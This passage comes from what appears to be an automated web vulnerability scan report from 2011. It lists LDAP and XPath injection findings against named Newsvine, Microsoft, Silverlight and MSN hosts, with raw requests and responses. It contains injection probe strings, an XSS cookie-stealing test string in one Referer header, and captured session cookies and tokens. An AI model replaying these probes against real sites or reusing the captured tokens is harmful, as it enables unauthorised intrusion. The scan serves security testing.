<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

2.25. http://www.polls.newsvine.com/_static/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /_static/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads aa0cfe9036308053)(sn=* and aa0cfe9036308053)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /aa0cfe9036308053)(sn=*/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:36:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=1836156681&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=1836156681&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

Request 2

GET /aa0cfe9036308053)!(sn=*/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:36:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=1885509883&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=1885509883&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

2.26. http://www.polls.newsvine.com/_vine/js/pierre [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /_vine/js/pierre

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads 3c3db971ca91afcd)(sn=* and 3c3db971ca91afcd)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /_vine/3c3db971ca91afcd)(sn=*/pierre HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:23:23 GMT
Content-Length: 15041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=293363911&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=293363911&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/_
...[SNIP]...

Request 2

GET /_vine/3c3db971ca91afcd)!(sn=*/pierre HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:23:23 GMT
Content-Length: 15051
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=2033081145&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=2033081145&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com
...[SNIP]...

3. XPath injection
There are 11 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


3.1. http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ajax.microsoft.com
Path:   /ajax/jQuery/jquery-1.3.2.min.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ajax/jQuery/jquery-1.3.2.min.js' HTTP/1.1
Host: ajax.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 791954442400000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:15 GMT
Content-Length: 32230
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
</strong>", releaseUrl: ajaxPath + "<strong>
...[SNIP]...

3.2. http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ajax.microsoft.com
Path:   /ajax/jQuery/jquery-1.4.2.min.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ajax/jQuery/jquery-1.4.2.min.js' HTTP/1.1
Host: ajax.microsoft.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 791805141200000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:52:30 GMT
Content-Length: 32329
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
</strong>", releaseUrl: ajaxPath + "<strong>
...[SNIP]...

3.3. http://blogs.silverlight.net/ScriptResource.axd [d parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://blogs.silverlight.net
Path:   /ScriptResource.axd

Issue detail

The d parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the d parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ScriptResource.axd?d=1kuLgEePUyZ5x1vAYc1EW-Krk0cguDDpiLsIYXXse8b0tAH0cpYYGD5goVWcKW0gReQra4IS5Zd75XKfurjglj0xejELjy__-RPRrABGk9h12y8wRirPHf5b2XtUjrv_5nimQtGfCP78kkUcYuOKnTR1iag1'&t=ffffffffbcc66b6e HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Sun, 29 Jan 2012 20:51:02 GMT
Last-Modified: Sat, 29 Jan 2011 20:51:02 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:28:36 GMT
Content-Length: 99448

...//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//----------------------------------------------------------
// Microsof
...[SNIP]...
<f;b++)try{var a=new ActiveXObject(c[b]);a.async=false;a.loadXML(d);a.setProperty("SelectionLanguage","XPath");return a}catch(g){}}else try{var e=new window.DOMParser;return e.parseFromString(d,"text/xml")}catch(g){}return null};Sys.Net.XMLHttpExecutor=function(){Sys.Net.XMLHttpExecutor.initializeBase(this);
...[SNIP]...

3.4. http://blogs.silverlight.net/ScriptResource.axd [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://blogs.silverlight.net
Path:   /ScriptResource.axd

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ScriptResource.axd?d=1kuLgEePUyZ5x1vAYc1EW-Krk0cguDDpiLsIYXXse8b0tAH0cpYYGD5goVWcKW0gReQra4IS5Zd75XKfurjglj0xejELjy__-RPRrABGk9h12y8wRirPHf5b2XtUjrv_5nimQtGfCP78kkUcYuOKnTR1iag1&t=ffffffffbcc66b6e&1'=1 HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Sun, 29 Jan 2012 23:26:23 GMT
Last-Modified: Sat, 29 Jan 2011 23:26:23 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:30:23 GMT
Content-Length: 99448

...//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//----------------------------------------------------------
// Microsof
...[SNIP]...
<f;b++)try{var a=new ActiveXObject(c[b]);a.async=false;a.loadXML(d);a.setProperty("SelectionLanguage","XPath");return a}catch(g){}}else try{var e=new window.DOMParser;return e.parseFromString(d,"text/xml")}catch(g){}return null};Sys.Net.XMLHttpExecutor=function(){Sys.Net.XMLHttpExecutor.initializeBase(this);
...[SNIP]...

3.5. http://blogs.silverlight.net/ScriptResource.axd [t parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://blogs.silverlight.net
Path:   /ScriptResource.axd

Issue detail

The t parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the t parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ScriptResource.axd?d=1kuLgEePUyZ5x1vAYc1EW-Krk0cguDDpiLsIYXXse8b0tAH0cpYYGD5goVWcKW0gReQra4IS5Zd75XKfurjglj0xejELjy__-RPRrABGk9h12y8wRirPHf5b2XtUjrv_5nimQtGfCP78kkUcYuOKnTR1iag1&t=ffffffffbcc66b6e' HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Sun, 29 Jan 2012 23:26:23 GMT
Last-Modified: Sat, 29 Jan 2011 23:26:23 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:28:37 GMT
Content-Length: 99448

...//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//----------------------------------------------------------
// Microsof
...[SNIP]...
<f;b++)try{var a=new ActiveXObject(c[b]);a.async=false;a.loadXML(d);a.setProperty("SelectionLanguage","XPath");return a}catch(g){}}else try{var e=new window.DOMParser;return e.parseFromString(d,"text/xml")}catch(g){}return null};Sys.Net.XMLHttpExecutor=function(){Sys.Net.XMLHttpExecutor.initializeBase(this);
...[SNIP]...

3.6. http://entertainment.redacted/news/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://entertainment.msn.com
Path:   /news/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /news'/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53218
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=7fabc37e939249ca90d016d1c2d17f62; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:49 GMT
Connection: close


